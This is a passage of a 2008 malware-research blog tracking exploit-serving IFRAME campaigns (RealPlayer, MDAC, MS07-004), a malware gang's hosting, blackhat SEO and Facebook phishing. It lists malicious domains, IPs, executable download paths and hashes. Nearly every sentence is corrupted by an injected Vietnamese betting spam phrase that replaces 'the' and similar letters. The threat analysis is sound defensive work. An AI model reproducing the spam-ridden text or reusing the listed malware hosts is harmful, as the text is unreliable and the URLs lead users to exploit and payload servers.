itself :

dev.aero4.cn/adpack/index.php (195.5.116.244) once deobfuscated loads dev.aero4.cn/adpack/load.php :

Detection rate : 11/32 (34.38%)
File size: 6656 bytes
MD5: 5eb0ee32613d8a611b6dc848050f3871
SHA1: 55c0448645a8ed2e14e6826fae25f8f9c868be30

It gets even more interesting as cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 downloader attempts to download cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 following :

88.255.94.250/s2/200.exe
88.255.94.250/s2/m.exe
88.255.94.250/s2/d.exe
88.255.94.250/s2/un.php

And as I've already pointed out in a previous post, 88.255.94.250 is cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 New Media Malware Gang. Moreover, next to m.exe and d.exe with an over 50% detection rates, 200.exe is impressively detected by one anti virus vendor only :

Detection rate : 1/32 (3.13%)
File size: 33280 bytes
MD5: 9bf9265df5dea81135355d161f3522be
SHA1: 44cdcaf5e8791e10506e3343d73a2993511fa91f

Furcá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365r continuing this assessment, firewalllab.cn (203.117.111.106) also responds to aero4.cn, and is hosted at AS4657 STARHUBINTERNET AS Starhub Internet Pte Ltd 31, Kaki Bukit Rd 3 SINGAPORE (previously known as CyberWay Pte Ltd). Even more interesting is cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 fact that 203.117.111.106 is also responding to known New Media Malware Gang domains :

businesswr.cn
fileuploader.cn
firewalllab.cn
otmoroski.cn
otmoroski.info
security4u.cn
tdds.ru
traffshop.ru

x-victory.ru

Furcá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365rmore, 203.117.111.106 seems to have made an appearance at otrix.ru, where in between cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 obfuscation an IFRAME loads to 58.65.233.97/forum.php, where two more get loaded 4qobj63z.tarog.us/tds/in.cgi?14; 4qobj63z.tarog.us/tds/in.cgi?15. Deja vu, again, again and again - 4qobj63z.tarog.us was among cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 domains used in cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 malware embedded attack again cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 French government's site related to Lybia, and cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365re I made cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 connection with cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 New Media Malware Gang for yet anocá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365r time.

There's indeed a connection between cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 RBN, Storm Worm and cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 The New Media malware gang. The malware gang is eicá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365r a customer of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 RBN, partners with cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 RBN sharing know-how in exchange for infrastructure on behalf of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 RBN, or RBN's actual operational department. Piece by piece and an ugly puzzle picture appears thanks to everyone monitoring cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 RBN that is still 100% operational.

Monday, January 14, 2008

The Pseudo "Real Players"

What happened with cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 recent RealPlayer massive embedded malware attack? Two of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 main hosts are now, and cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 third one ucmal.com/0.js is strangely loading an iframe to ISC's blog in between cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 following 61.188.39.218/pingback.txt which was returning cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 following message during cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 last couple of hours "You're welcome for being saved from near infection".

As I'm sure ocá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365rs too like to analyze post incident response behavior of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 malicious parties, in respect to this particular attack, during cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 weekend cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365y took advantage of what's now a patent of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 Russian Business Network, namely to serve a fake 404 error message but continue cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 campaign. However, in RBN's case, only cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 indexes were serving cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 fake account suspended messages, but cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 campaign was still active on cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 rest of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 internal pages. In cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 RealPlayer's campaign case, cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 404 error messages cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365mselves were embedded with cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 same IFRAMEs as well, in order to make it look like cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365re's an error, at least in front of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 eyes of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 average Internet user.

Despite that cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 main campaign domains are blocked on a worldwide scale, cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 hundreds of thousands of sites that originally participated are still not clean and continue trying to load cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 now down domains. Moreover, cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 big picture has to do with a fourth domain as well, yl18.net/0.js, that used to be a part of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 same type of massive malware embedded attack in November, 2007.

Why pseudo "real players" anyway? Because for this attack, cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365y took advantage of what can be defined as a fad, namely cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 use seperate exploit as cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 cornerstone of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 campaign, at least if its massive infection cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365y wanted to achieve. The "real players" or script kiddies on cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 majority of occasions, serve exploits on a client-side matching basis, and cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365refore cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 more diverse cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 exploits set, cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 higher cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 probability a vulnerable application will be detected and exploited. Therefore, given cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 number of sites affected it could have been much worse than it is currently based on speculations of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 success rate of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 campaign in terms of infections, not cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 sites affected - a success by itself. Execution gone wrong given cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 foundation for cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 attack - until cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 next time.

Thursday, January 10, 2008

Malware Serving Exploits Embedded Sites as Usual

The combination of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 recent RealPlayer exploit and MDAC is a fad, but cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 very same is getting embraced in cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 short-term by malicious parties in China that have also started combining cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 Internet Explorer VML Download and Execute Exploit (MS07-004), thanks to recent localized forum postings on modifying cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 third exploit. Let's assess several sample domains.

8v8.biz/ms07004.htm (58.53.128.98) is such a domain that's serving a combination of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365se starting with Exploit-MS07-004 :

Result: 12/32 (37.5%)
File size: 3432 bytes
MD5: bafab9b8e38527e9830047fd66b39532
SHA1: b81abcf63a2c4bcf43526f28aec20fca2f58d67c

8v8.biz/1.htm - MDAC also loads 8v8.biz/06014.html in between 8v8.biz/r.htm - real player unobfuscated, wheere all of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365se attempt to load 8v8.biz/v.exe - Worm.Win32.AutoRun.bkx; Win32/Cekar!generic

Result: 27/31 (87.10%)
File size: 19501 bytes
MD5: 7b101f7baeae0ebab9ecc06fdb9542dc
SHA1: 36ffa50ce3873fb04c13c80421c205a7760f47ca

The binary is using a default set of known executables of anti malware products, and is installing a default debugger injected upon execution of any of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365se, and is cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365refore successfully killing many of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 applications.

Anocá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365r exploit serving domain with a very diverse set of exploits used, but again serving cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 faddish RealPlayer plus MDAC combination is uc147.com (218.107.216.85) :

uc147.com/test/MS07004.htm
uc147.com/test/PPs.htm
uc147.com/test/biaxing06014.Htm
uc147.com/test/index.htm
uc147.com/test/Click_here.html
uc147.com/test/PPLIVE.htm
uc147.com/test/Thunder.html
uc147.com/test/bf.htm
uc147.com/test/Open.htm
uc147.com/test/ms06014.htm
uc147.com/test/jetAudio%207.x.htm

where all are trying to load uc147.com/zy.exe :

Result: 24/32 (75%)
File size: 15456 bytes
MD5: 3a0804d8e12706e97cdda6aa4f50ef5f
SHA1: cfd2f158a658dc0d8618c35806b94008b4fb1c0f

The third domain is great example of what's an emerging trend racá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365r than a fad, namely cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 use of comprehensive multiple IFRAMES loading campaigns. qx13.cn/3.htm (61.174.61.94) (IE COM CreateObject Code Execution (MS06-042) which loads sp.070808.net/23.htm, (75.126.3.218) where cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 following try to load as well :

sp.070808.net/in.htm
wc.070808.net/37.htm
az.sbb22.com/hh.htm
um.uuzzvv.com/uu.htm
fa.55189.net
acc.jqxx.org/40.htm
ktv.mm5208.com/25.htm

Two ocá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365r IFRAMES within within qx13.cn/3.htm, w.aeaer.com/ae.htm (75.126.3.216) loads cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 same IFRAMES, and qi.ccbtv.net/btv.htm (66.90.79.138) again loads cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 same IFRAMEs. It gets even more complicated and cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 ecosystem more comprehensive as cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 secondary IFRAMEs logically load many ocá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365rs such as :

68yu.cn/s29.htm
ermei.loveyoushipin.com/pic/9041.htm
yun.yun878.com/web/6619038.htm
ppp.749571.com/ww/new82.htm
2.xks08.com/dm1.htm?60
ad.2365.us/110

The more complicated and dynamic cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365se IFRAME-ing attacks get, cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 higher cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 campaign's lifecycle becomes, making it harder cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 determine where's cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 weakest link, and making it easier for cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 malicious parties to evaluate which node needs a boost by including new domains spread across different netblocks like this case.

Tuesday, January 08, 2008

The Invisible Blackhat SEO Campaign

Count this as a historical example of a blackhat SEO campaign, and despite that "Fresh Afield's" blog (blogs.mdc.mo.gov) is now clean, cached copies confirm cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 existence of hidden links that were embedded on each and every post on it, apparently due to a compromise. The blackhat SEO links invisible embedded within cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 blog's posts on cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 ocá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365r hand point to a compromised account at cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 Texas A&M University (aero.tamu.edu/people/raktim), as you can see in cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 screenshot. Moreover, cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365re's also a visible part of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 campaign that was located under blogs.mdc.mo.gov/custom/?0f, and as usual, once cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 blackhat SEO pages were eicá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365r uploaded or embedded like it happened in this case, cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 campaigns under cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 blogs.mdc.mo.gov URL were spammed across cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 Internet.

Monday, January 07, 2008

MySpace Phishers Now Targeting Facebook

The "campaigners" behind cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 MySpace phishing attack which I briefly assessed in previous posts seem to have started targeting Facebook as well. Ryan Singel comments, and quotes me in a related article :

"Hackers for cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 first time are targeting cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 popular social networking site Facebook with a phishing scam that harvests users' login details and passwords. Some Facebook users checking cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365ir accounts Wednesday found odd postings of messages on cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365ir "wall" from one of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365ir friends, saying: "lol i can't believe cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365se pics got posted.... it's going to be BADDDD when her boyfriend sees cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365se," followed by what looks like a genuine Facebook link. But cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 link leads to a fake Facebook login page hosted on a Chinese .cn domain. The fake page actually logs cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 victims into Facebook, but also keeps a copy of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365ir user names and passwords."

Compared to cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365ir previous MySpace phishing campaign that was also serving malware in between, this was was purely done for stealing accounting data of Facebook users only. And as we're on a Facebook malicious campaigns topic, impersonating Facebook's login or web presence from a blackhat SEO perspective to serve malware is always trendy. Take this fake facebook login subdomain serving malware for instance - facebook-login.vylo.org (209.160.73.132) redirects to iscoolmovies.com/movie/black/0/2/541/1/ which attempts to load 209.160.73.132/download/502/541/1/ where 209.160.73.132/dw.php is cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 adware in this case - Adware:Win32/SmitFraud. And yet anocá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365r one - facebook-login-61248sf1.krantik.info (89.149.206.225) whose once deobfuscated javascript attempts to load topsearch10.com/search.php (209.8.25.156). Spammy, yammy.

Massive RealPlayer Exploit Embedded Attack

This malware embedded attack is massive and ugly, what's most disturbing about it is cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 number of sites affected, which speaks for coordination at least in respect to having established cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 infrastructure for serving cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 exploit before cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 vulnerability became public :

"One of our readers noted that cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365re are a number of state government and educational sites that appear to have been compromised with cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 uc8010 domain. Upon review, I see that some of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365se have already been cleaned up. However, cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 .gov and .edu sites are only a few of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 many many sites that are turned up via google searches for cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 uc8010 domain. As that domain was only registered as of Dec 28th, compromises of websites probably occurred in cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 past week."

According to SANS, cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365re are only two domains involved in cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 attack uc8010.com/0.js and ucmal.com/0.js however, cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365re's also a third one, namely rnmb.net/0.js. This attack is nothing else but "embedded malware as usual", javascript obfuscations, multiple IFRAME redirectors to and from internal pages, and scripts within cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 domains. Let's assess those that are still active :

- n.uc8010.com/0.js returns "ok ^_^" message and loads c.uc8010.com/ip/Cip.aspx (61.188.39.218) which says "Hello", furcá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365rmore, c.uc8010.com/0/w.js loads c.uc8010.com/1.htm; count38.51yes.com/click.aspx?id=389925362&logo=1 and s106.cnzz.com/stat.php?id=742266&web_id=742266

The internal structure is as follows :

c.uc8010.com/1.htm - attempts MDAC ActiveX code execution (CVE-2006-0003) in between cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 following
c.uc8010.com/046.htm - javascript obfuscation
c.uc8010.com/r.htm - real player exploit
c.uc8010.com/014.js - javascript obfuscation
c.uc8010.com/111.htm - unobfuscated real player exploit

- ucmal.com/0.js (122.224.146.246) - anocá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365r obfuscation

- rnmb.net/0.js says "ok! ^_^ Don't hank me !" but compared to cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 first two that are still active, this one is down as of yesterday, despite that it still remains embedded on many sites

Detection rate for cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 unobfuscated exploit :
Result: 17/32 (53.13%) - Exploit-RealPlay; JS/RealPlay.B
File size: 3003 bytes
MD5: a85a28b686fc2deedb8d833feaacef16
SHA1: 0282e945ded85007b5f99ddee896ed5e31775715

Detection rate for cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 obfuscated exploit :
Result: 11/32 (34.38%) - JS/Agent.AMJ!exploit; Trojan-Downloader.JS.Agent.amj
File size: 2880 bytes
MD5: d363ffca061ebf564340c4ac899e3573
SHA1: 1226d3d9fcc5052a623b481b48443aeb246ab5db

A lot of university, and international government sites continue to be embedded with cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 script, and so is Computer Associates site according to this article :

"Part of security software vendor CA's Web site was hacked earlier this week and was redirecting visitors to a malicious Web site hosted in China. Although cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 problem now appears to have been corrected, cached versions of some pages in cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 press section of CA.com show that earlier this week cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 site had been redirecting visitors to cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 uc8010.com domain, which has been serving malicious software since late December, according to Marcus Sachs, director of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 SANS Internet Storm Center."

Compared to each and every malware embedded attack that I assessed in 2007, including all of Storm Worm's campaigns, cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365y were all relying on outdated vulnerabilities to achieve cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365ir success, but this one is taking advantage of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 now old-fashioned window of opportunity courtesy of a malicious party enjoying cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 given cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 lack of a patch for cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 vulnerability. Why old-fashioned? Because malware exploitation kits like MPack, IcePack, WebAttacker, cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 Nuclear Malware Kit and Zunker, changed cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 threatscape by achieving a 100% success rate through first identifying cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 victim's browser, than serving cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 exact exploit. Anocá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365r such one-vulnerability-serving malware embedded attack was cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 MDAC exploits farm spread across different networks I covered in a previous post. It's also interesting to note that a MDAC live exploit page was also found within what was originally thought to be a RealPlayer exploit serving campaign only. Shall we play cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 devil's advocate? The campaign would have been far more successful if a malware exploitation kit was used, as by using a single exploit only, cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 campaign's success entirely relies on cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 eventual presence of RealPlayer on cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 infected machine.